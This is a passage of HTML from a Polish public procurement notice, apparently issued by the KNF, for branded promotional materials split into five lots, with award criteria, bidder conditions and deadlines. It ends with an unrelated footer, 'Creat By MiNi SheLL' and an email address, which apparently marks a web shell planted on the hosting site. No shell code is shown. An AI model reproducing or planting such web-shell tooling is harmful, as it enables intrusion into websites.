na zamek, z nadrukiem logo KNF lub UKNF w kolorze białym, fason: męski, wraz z wizualizacją znakowania<br/><br/>7)	50 szt. bluz ciepłych z kapturem i kieszenią typu kangur unisex z haftowanym logo KNF lub UKNF, wraz z wizualizacją znakowania </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79971100-2 - Usługi introligatorskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dla części I <br/><br/>-	Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie co najmniej 2 zamówienia:<br/>- 1 zamówienie na kwotę, co najmniej 2 000,00 zł brutto, polegające na dostawie długopisów - z naniesionym znakowaniem w liczbie co najmniej 2000 szt. <br/>oraz<br/>- 1 zamówienie polegające na dostawie - innych niż długopis - rodzajów materiałów promocyjno-konferencyjnych spośród wskazanych w katalogu z pkt 3.3. dla części I - z naniesionym nadrukiem lub znakowaniem w liczbie co najmniej po 200 szt., o łącznej wartości 5 000,00 zł brutto.<br/>Jeżeli dostawa długopisów była częścią większego zamówienia, wartość dostawy długopisów w ramach tego zamówienia musi być nie mniejsza niż 2 000,00 zł brutto.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaganie to musi spełniać co najmniej jeden z Wykonawców ubiegających się <br/>o udzielenie zamówienia publicznego.	<br/><br/>Dla części II <br/><br/>-	Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 2 zamówienia na kwotę, co najmniej 2 000 zł brutto każde zamówienie, polegającego na dostawie dowolnego rodzaju materiałów promocyjno-konferencyjnych spośród materiałów wskazanych w katalogu z pkt 3.3. dla części II - z naniesionym nadrukiem w liczbie co najmniej 200 szt. materiałów łącznie w ramach jednego zamówienia.<br/>Jeżeli dostawa worków/plecaków albo toreb płóciennych była częścią większego zamówienia, wartość dostawy worków/plecaków albo toreb płóciennych w ramach tego zamówienia musi być nie mniejsza niż 2 000,00 zł brutto.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaganie to musi spełniać co najmniej jeden z Wykonawców ubiegających się <br/>o udzielenie zamówienia publicznego.<br/><br/>Dla części III<br/>- Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie co najmniej 2 zamówienia:<br/>- 1 zamówienie na kwotę, co najmniej 5 000,00 zł brutto, polegające na dostawie plecaków na laptopa albo toreb na laptopa - z naniesionym znakowaniem w liczbie co najmniej 50 szt. <br/>oraz<br/>- 1 zamówienie polegające na dostawie - innych niż plecak na laptopa albo torba na laptopa - rodzajów materiałów promocyjno-konferencyjnych spośród wskazanych w katalogu z pkt 3.3. dla części III - z naniesionym nadrukiem lub znakowaniem w liczbie co najmniej po 100 szt., o łącznej wartości 3 000,00 zł brutto.<br/>Jeżeli dostawa plecaków na laptopa albo toreb na laptopa była częścią większego zamówienia, wartość dostawy plecaków na laptopa albo toreb na laptopa w ramach tego zamówienia musi być nie mniejsza niż 5 000,00 zł brutto.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaganie to musi spełniać co najmniej jeden z Wykonawców ubiegających się <br/>o udzielenie zamówienia publicznego.<br/><br/>Dla części IV <br/><br/>-	Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie co najmniej 2 zamówienia:<br/>- 1 zamówienie na kwotę, co najmniej 2 000,00 zł brutto, polegające na dostawie kubków termicznych albo termosów - z naniesionym znakowaniem w liczbie co najmniej 200 szt. <br/>oraz<br/>- 1 zamówienie polegające na dostawie - innych niż kubek termiczny albo termos - rodzajów materiałów promocyjno-konferencyjnych spośród wskazanych w katalogu z pkt 3.3. dla części IV - z naniesionym nadrukiem lub znakowaniem w liczbie co najmniej po 100 szt., o łącznej wartości 2 000,00 zł brutto.<br/>Jeżeli dostawa kubków termicznych albo termosów była częścią większego zamówienia, wartość dostawy kubków termicznych albo termosów w ramach tego zamówienia musi być nie mniejsza niż 2 000,00 zł brutto.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaganie to musi spełniać co najmniej jeden z Wykonawców ubiegających się <br/>o udzielenie zamówienia publicznego.<br/><br/>Dla części V <br/><br/>-	Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie co najmniej 2 zamówienia:<br/>- 1 zamówienie na kwotę, co najmniej 5 000,00 zł brutto, polegające na dostawie bluz z haftowanym logo w liczbie co najmniej 50 szt. <br/>oraz<br/>- 1 zamówienie polegające na dostawie - innych niż bluza z haftowanym logo - rodzajów materiałów promocyjno-konferencyjnych spośród wskazanych w katalogu z pkt 3.3. dla części V - z naniesionym nadrukiem lub znakowaniem w liczbie co najmniej po 100 szt., o łącznej wartości 3 000,00 zł brutto.<br/>Jeżeli dostawa bluz z haftowanym logo była częścią większego zamówienia, wartość dostawy bluz z haftowanym logo w ramach tego zamówienia musi być nie mniejsza niż 5 000,00 zł brutto.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaganie to musi spełniać co najmniej jeden z Wykonawców ubiegających się <br/>o udzielenie zamówienia publicznego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykazu zamówień wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed<br/>upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których zamówienia zostały wykonane, oraz załączeniem dowodów określających,<br/>czy zamówienia te zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego zamówienia zostały wykonywane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych<br/>referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy,<br/>którego wzór stanowi Załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zawiera projekt Umowy stanowiący Załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma E-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-27 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com